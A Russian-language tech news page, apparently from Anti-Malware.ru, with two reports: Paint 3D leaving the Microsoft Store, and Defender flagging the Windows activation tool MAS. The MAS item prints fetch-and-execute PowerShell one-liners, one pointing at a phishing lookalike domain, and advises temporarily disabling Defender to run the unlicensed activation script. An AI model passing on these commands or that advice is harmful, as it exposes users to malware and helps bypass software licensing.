Microsoft откажется от Paint 3D в Windows 4 ноября

Microsoft откажется от Paint 3D в Windows 4 ноября

Microsoft откажется от Paint 3D в Windows 4 ноября

Microsoft готовится убить растровый графический редактор Paint 3D. Согласно сообщению корпорации, приложение удалят из системы ближе к концу года, а из Microsoft Store оно пропадёт в ноябре.

Напомним, в 2016 году Paint 3D пришёл на смену обычному Paint. С релизом предварительной сборки Windows 10 14971 разработчики внедрили его в систему.

Теперь, судя по всему, пришло время попрощаться с Paint 3D, о чём Microsoft уведомляет на официальном ресурсе:

«Поскольку приложение Paint 3D устарело, оно пропадёт из Microsoft Store 4 ноября 2024 года. Уже установленная программа будет продолжать работать в прежнем режиме, однако скачать её заново не получится».

«Если вы планируете переустанавливать Paint 3D, имейте в виду, что сделать это нужно до 4 ноября. В некоторых версиях системы Windows 10 это приложение предустановленно, однако в Windows 11 его уже нет».

Учитывая, что за последнее время разработчики добавили много полезной функциональности обычному Paint, пользователи вряд ли будут страдать от прекращения поддержки Paint 3D.

Paint сейчас умеет удалять фон у изображений, поддерживает слои и прозрачность, а также разработчики добавили «родному» графическому редактору ИИ-генератор — Paint Cocreator.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru